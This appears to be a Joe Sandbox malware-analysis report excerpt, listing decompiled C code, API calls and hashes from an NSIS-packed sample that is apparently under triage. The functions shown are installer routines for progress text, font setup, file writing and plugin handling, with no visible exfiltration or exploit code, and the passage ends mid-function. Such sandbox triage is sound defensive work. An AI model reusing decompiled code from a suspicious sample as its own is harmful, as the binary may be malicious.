                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 73%
                                                              			E00401E4E(intOrPtr __edx) {
                                                              				void* __edi;
                                                              				int _t9;
                                                              				signed char _t15;
                                                              				struct HFONT__* _t18;
                                                              				intOrPtr _t30;
                                                              				void* _t31;
                                                              				struct HDC__* _t33;
                                                              				void* _t35;
                                                              
                                                              				_t30 = __edx;
                                                              				_t33 = GetDC( *(_t35 - 8));
                                                              				_t9 = E00402D84(2);
                                                              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                              				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                              				ReleaseDC( *(_t35 - 8), _t33);
                                                              				 *0x40ce08 = E00402D84(3);
                                                              				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                              				 *0x40ce0f = 1;
                                                              				 *0x40ce0c = _t15 & 0x00000001;
                                                              				 *0x40ce0d = _t15 & 0x00000002;
                                                              				 *0x40ce0e = _t15 & 0x00000004;
                                                              				E004066A5(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x2c)));
                                                              				_t18 = CreateFontIndirectW(0x40cdf8);
                                                              				_push(_t18);
                                                              				_push(_t31);
                                                              				E004065AF();
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                              				return 0;
                                                              			}











                                                              0x00401e4e
                                                              0x00401e59
                                                              0x00401e5b
                                                              0x00401e68
                                                              0x00401e7f
                                                              0x00401e84
                                                              0x00401e91
                                                              0x00401e96
                                                              0x00401e9a
                                                              0x00401ea5
                                                              0x00401eac
                                                              0x00401ebe
                                                              0x00401ec4
                                                              0x00401ec9
                                                              0x00401ed3
                                                              0x00402638
                                                              0x0040156d
                                                              0x00402ba4
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • GetDC.USER32(?), ref: 00401E51
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000), ref: 004068A4
                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                              • String ID: Tahoma
                                                              • API String ID: 2584051700-3580928618
                                                              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                              • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                              • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                              				short _v132;
                                                              				void* _t11;
                                                              				WCHAR* _t19;
                                                              
                                                              				if(_a8 == 0x110) {
                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                              					_a8 = 0x113;
                                                              				}
                                                              				if(_a8 == 0x113) {
                                                              					_t11 = E00403012();
                                                              					_t19 = L"unpacking data: %d%%";
                                                              					if( *0x42a270 == 0) {
                                                              						_t19 = L"verifying installer: %d%%";
                                                              					}
                                                              					wsprintfW( &_v132, _t19, _t11);
                                                              					SetWindowTextW(_a4,  &_v132);
                                                              					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                              				}
                                                              				return 0;
                                                              			}






                                                              0x00402fa3
                                                              0x00402fb1
                                                              0x00402fb7
                                                              0x00402fb7
                                                              0x00402fc5
                                                              0x00402fc7
                                                              0x00402fd3
                                                              0x00402fd8
                                                              0x00402fda
                                                              0x00402fda
                                                              0x00402fe5
                                                              0x00402ff5
                                                              0x00403007
                                                              0x00403007
                                                              0x0040300f

                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                              • wsprintfW.USER32 ref: 00402FE5
                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                              • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                              • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                              • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E6F672655() {
                                                              				intOrPtr _t24;
                                                              				void* _t26;
                                                              				intOrPtr _t27;
                                                              				signed int _t39;
                                                              				void* _t40;
                                                              				void* _t43;
                                                              				intOrPtr _t44;
                                                              				void* _t45;
                                                              
                                                              				_t40 = E6F6712BB();
                                                              				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                              				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                              				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                              				do {
                                                              					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                              					}
                                                              					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                              					if(_t39 <= 7) {
                                                              						switch( *((intOrPtr*)(_t39 * 4 +  &M6F672784))) {
                                                              							case 0:
                                                              								 *_t40 = 0;
                                                              								goto L17;
                                                              							case 1:
                                                              								__eax =  *__eax;
                                                              								if(__ecx > __ebx) {
                                                              									 *(__esp + 0x10) = __ecx;
                                                              									__ecx =  *(0x6f67407c + __edx * 4);
                                                              									__edx =  *(__esp + 0x10);
                                                              									__ecx = __ecx * __edx;
                                                              									asm("sbb edx, edx");
                                                              									__edx = __edx & __ecx;
                                                              									__eax = __eax &  *(0x6f67409c + __edx * 4);
                                                              								}
                                                              								_push(__eax);
                                                              								goto L15;
                                                              							case 2:
                                                              								__eax = E6F671510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                              								goto L16;
                                                              							case 3:
                                                              								__ecx =  *0x6f67506c;
                                                              								__edx = __ecx - 1;
                                                              								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                              								__eax =  *0x6f67506c;
                                                              								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                              								goto L17;
                                                              							case 4:
                                                              								__eax = lstrcpynW(__edi,  *__eax,  *0x6f67506c);
                                                              								goto L17;
                                                              							case 5:
                                                              								_push( *0x6f67506c);
                                                              								_push(__edi);
                                                              								_push( *__eax);
                                                              								__imp__StringFromGUID2();
                                                              								goto L17;
                                                              							case 6:
                                                              								_push( *__esi);
                                                              								L15:
                                                              								__eax = wsprintfW(__edi, 0x6f675000);
                                                              								L16:
                                                              								__esp = __esp + 0xc;
                                                              								goto L17;
                                                              						}
                                                              					}
                                                              					L17:
                                                              					_t26 =  *(_t43 + 0x14);
                                                              					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                              						GlobalFree(_t26);
                                                              					}
                                                              					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                              					if(_t27 != 0) {
                                                              						if(_t27 != 0xffffffff) {
                                                              							if(_t27 > 0) {
                                                              								E6F671381(_t27 - 1, _t40);
                                                              								goto L26;
                                                              							}
                                                              						} else {
                                                              							E6F671312(_t40);
                                                              							L26:
                                                              						}
                                                              					}
                                                              					_t44 = _t44 - 1;
                                                              					_t43 = _t43 - 0x20;
                                                              				} while (_t44 >= 0);
                                                              				return GlobalFree(_t40);
                                                              			}











                                                              0x6f67265f
                                                              0x6f672661
                                                              0x6f672665
                                                              0x6f672674
                                                              0x6f672678
                                                              0x6f67267d
                                                              0x6f67267d
                                                              0x6f672685
                                                              0x6f67268c
                                                              0x6f672692
                                                              0x00000000
                                                              0x6f672699
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6726a1
                                                              0x6f6726a5
                                                              0x6f6726a8
                                                              0x6f6726ac
                                                              0x6f6726b3
                                                              0x6f6726b7
                                                              0x6f6726bd
                                                              0x6f6726bf
                                                              0x6f6726c1
                                                              0x6f6726c1
                                                              0x6f6726c8
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6726d1
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6726d8
                                                              0x6f6726de
                                                              0x6f6726e8
                                                              0x6f6726ee
                                                              0x6f6726f3
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672714
                                                              0x00000000
                                                              0x00000000
                                                              0x6f6726fa
                                                              0x6f672700
                                                              0x6f672701
                                                              0x6f672703
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67271c
                                                              0x6f67271e
                                                              0x6f672724
                                                              0x6f67272a
                                                              0x6f67272a
                                                              0x00000000
                                                              0x00000000
                                                              0x6f672692
                                                              0x6f67272d
                                                              0x6f67272d
                                                              0x6f672732
                                                              0x6f672743
                                                              0x6f672743
                                                              0x6f672749
                                                              0x6f67274e
                                                              0x6f672753
                                                              0x6f67275f
                                                              0x6f672764
                                                              0x00000000
                                                              0x6f672769
                                                              0x6f672755
                                                              0x6f672756
                                                              0x6f67276a
                                                              0x6f67276a
                                                              0x6f672753
                                                              0x6f67276b
                                                              0x6f67276c
                                                              0x6f67276f
                                                              0x6f672783

                                                              APIs
                                                                • Part of subcall function 6F6712BB: GlobalAlloc.KERNELBASE(00000040,?,6F6712DB,?,6F67137F,00000019,6F6711CA,-000000A0), ref: 6F6712C5
                                                              • GlobalFree.KERNEL32(?), ref: 6F672743
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F672778
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 4a55437315e87e23ed420f64d20773942ea399bfe8327595e7ae99f6bb659924
                                                              • Instruction ID: 2a948d7d3c7083289f14620144552863a3289a23986d3d551ae76942b53c74f1
                                                              • Opcode Fuzzy Hash: 4a55437315e87e23ed420f64d20773942ea399bfe8327595e7ae99f6bb659924
                                                              • Instruction Fuzzy Hash: D131DC71208611EFCB3A8F69CAD8C6A77F6FB87364710466AF10083260DF71B8659F61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E00402950(void* __ebx, void* __eflags) {
                                                              				WCHAR* _t26;
                                                              				void* _t29;
                                                              				long _t37;
                                                              				void* _t49;
                                                              				void* _t52;
                                                              				void* _t54;
                                                              				void* _t56;
                                                              				void* _t59;
                                                              				void* _t60;
                                                              				void* _t61;
                                                              
                                                              				_t49 = __ebx;
                                                              				_t52 = 0xfffffd66;
                                                              				_t26 = E00402DA6(0xfffffff0);
                                                              				_t55 = _t26;
                                                              				 *(_t61 - 0x40) = _t26;
                                                              				if(E00405FAE(_t26) == 0) {
                                                              					E00402DA6(0xffffffed);
                                                              				}
                                                              				E00406133(_t55);
                                                              				_t29 = E00406158(_t55, 0x40000000, 2);
                                                              				 *(_t61 + 8) = _t29;
                                                              				if(_t29 != 0xffffffff) {
                                                              					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                              					if( *(_t61 - 0x28) != _t49) {
                                                              						_t37 =  *0x42a274;
                                                              						 *(_t61 - 0x44) = _t37;
                                                              						_t54 = GlobalAlloc(0x40, _t37);
                                                              						if(_t54 != _t49) {
                                                              							E004035F8(_t49);
                                                              							E004035E2(_t54,  *(_t61 - 0x44));
                                                              							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                              							 *(_t61 - 0x10) = _t59;
                                                              							if(_t59 != _t49) {
                                                              								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                              								while( *_t59 != _t49) {
                                                              									_t51 =  *_t59;
                                                              									_t60 = _t59 + 8;
                                                              									 *(_t61 - 0x3c) =  *_t59;
                                                              									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                              									_t59 = _t60 +  *(_t61 - 0x3c);
                                                              								}
                                                              								GlobalFree( *(_t61 - 0x10));
                                                              							}
                                                              							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                              							GlobalFree(_t54);
                                                              							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                              						}
                                                              					}
                                                              					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                              					CloseHandle( *(_t61 + 8));
                                                              				}
                                                              				_t56 = 0xfffffff3;
                                                              				if(_t52 < _t49) {
                                                              					_t56 = 0xffffffef;
                                                              					DeleteFileW( *(_t61 - 0x40));
                                                              					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                              				}
                                                              				_push(_t56);
                                                              				E00401423();
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                                              				return 0;
                                                              			}













                                                              0x00402950
                                                              0x00402952
                                                              0x00402957
                                                              0x0040295c
                                                              0x0040295f
                                                              0x00402969
                                                              0x0040296d
                                                              0x0040296d
                                                              0x00402973
                                                              0x00402980
                                                              0x00402988
                                                              0x0040298b
                                                              0x00402997
                                                              0x0040299a
                                                              0x004029a0
                                                              0x004029ae
                                                              0x004029b3
                                                              0x004029b7
                                                              0x004029ba
                                                              0x004029c3
                                                              0x004029cf
                                                              0x004029d3
                                                              0x004029d6
                                                              0x004029e0
                                                              0x004029ff
                                                              0x004029e7
                                                              0x004029ec
                                                              0x004029f4
                                                              0x004029f7
                                                              0x004029fc
                                                              0x004029fc
                                                              0x00402a06
                                                              0x00402a06
                                                              0x00402a13
                                                              0x00402a19
                                                              0x00402a1f
                                                              0x00402a1f
                                                              0x004029b7
                                                              0x00402a33
                                                              0x00402a35
                                                              0x00402a35
                                                              0x00402a3f
                                                              0x00402a40
                                                              0x00402a44
                                                              0x00402a48
                                                              0x00402a4e
                                                              0x00402a4e
                                                              0x00402a55
                                                              0x004022f1
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                              • GlobalFree.KERNEL32(?), ref: 00402A06
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                              • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                              • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                              • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                              				char _v68;
                                                              				char _v132;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t23;
                                                              				signed int _t24;
                                                              				void* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t44;
                                                              				signed int _t46;
                                                              				signed int _t50;
                                                              				signed int _t52;
                                                              				signed int _t53;
                                                              				signed int _t55;
                                                              
                                                              				_t23 = _a16;
                                                              				_t53 = _a12;
                                                              				_t44 = 0xffffffdc;
                                                              				if(_t23 == 0) {
                                                              					_push(0x14);
                                                              					_pop(0);
                                                              					_t24 = _t53;
                                                              					if(_t53 < 0x100000) {
                                                              						_push(0xa);
                                                              						_pop(0);
                                                              						_t44 = 0xffffffdd;
                                                              					}
                                                              					if(_t53 < 0x400) {
                                                              						_t44 = 0xffffffde;
                                                              					}
                                                              					if(_t53 < 0xffff3333) {
                                                              						_t52 = 0x14;
                                                              						asm("cdq");
                                                              						_t24 = 1 / _t52 + _t53;
                                                              					}
                                                              					_t25 = _t24 & 0x00ffffff;
                                                              					_t55 = _t24 >> 0;
                                                              					_t46 = 0xa;
                                                              					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                              				} else {
                                                              					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                              					_t50 = 0;
                                                              				}
                                                              				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                              				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
                                                              				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
                                                              				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                              				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
                                                              			}



















                                                              0x00404e7a
                                                              0x00404e7f
                                                              0x00404e87
                                                              0x00404e88
                                                              0x00404e95
                                                              0x00404e9d
                                                              0x00404e9e
                                                              0x00404ea0
                                                              0x00404ea2
                                                              0x00404ea4
                                                              0x00404ea7
                                                              0x00404ea7
                                                              0x00404eae
                                                              0x00404eb4
                                                              0x00404eb4
                                                              0x00404ebb
                                                              0x00404ec2
                                                              0x00404ec5
                                                              0x00404ec8
                                                              0x00404ec8
                                                              0x00404ecc
                                                              0x00404edc
                                                              0x00404ede
                                                              0x00404ee1
                                                              0x00404e8a
                                                              0x00404e8a
                                                              0x00404e91
                                                              0x00404e91
                                                              0x00404ee9
                                                              0x00404ef4
                                                              0x00404f0a
                                                              0x00404f1b
                                                              0x00404f37

                                                              APIs
                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                              • wsprintfW.USER32 ref: 00404F1B
                                                              • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$H7B
                                                              • API String ID: 3540041739-107966168
                                                              • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                              • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                              • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                              • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 85%
                                                              			E6F672480(void* __edx) {
                                                              				void* _t37;
                                                              				signed int _t38;
                                                              				void* _t39;
                                                              				void* _t41;
                                                              				signed char* _t42;
                                                              				signed char* _t51;
                                                              				void* _t52;
                                                              				void* _t54;
                                                              
                                                              				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                              				while(1) {
                                                              					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                              					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                              					_t52 = _t51[0x18];
                                                              					if(_t52 == 0) {
                                                              						goto L9;
                                                              					}
                                                              					_t41 = 0x1a;
                                                              					if(_t52 == _t41) {
                                                              						goto L9;
                                                              					}
                                                              					if(_t52 != 0xffffffff) {
                                                              						if(_t52 <= 0 || _t52 > 0x19) {
                                                              							_t51[0x18] = _t41;
                                                              							goto L12;
                                                              						} else {
                                                              							_t37 = E6F67135A(_t52 - 1);
                                                              							L10:
                                                              							goto L11;
                                                              						}
                                                              					} else {
                                                              						_t37 = E6F6712E3();
                                                              						L11:
                                                              						_t52 = _t37;
                                                              						L12:
                                                              						_t13 =  &(_t51[8]); // 0x1020
                                                              						_t42 = _t13;
                                                              						if(_t51[4] >= 0) {
                                                              						}
                                                              						_t38 =  *_t51 & 0x000000ff;
                                                              						_t51[0x1c] = 0;
                                                              						if(_t38 > 7) {
                                                              							L27:
                                                              							_t39 = GlobalFree(_t52);
                                                              							if( *(_t54 + 0x10) == 0) {
                                                              								return _t39;
                                                              							}
                                                              							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                              								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                              							} else {
                                                              								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                              							}
                                                              							continue;
                                                              						} else {
                                                              							switch( *((intOrPtr*)(_t38 * 4 +  &M6F6725F8))) {
                                                              								case 0:
                                                              									 *_t42 = 0;
                                                              									goto L27;
                                                              								case 1:
                                                              									__eax = E6F6713B1(__ebp);
                                                              									goto L21;
                                                              								case 2:
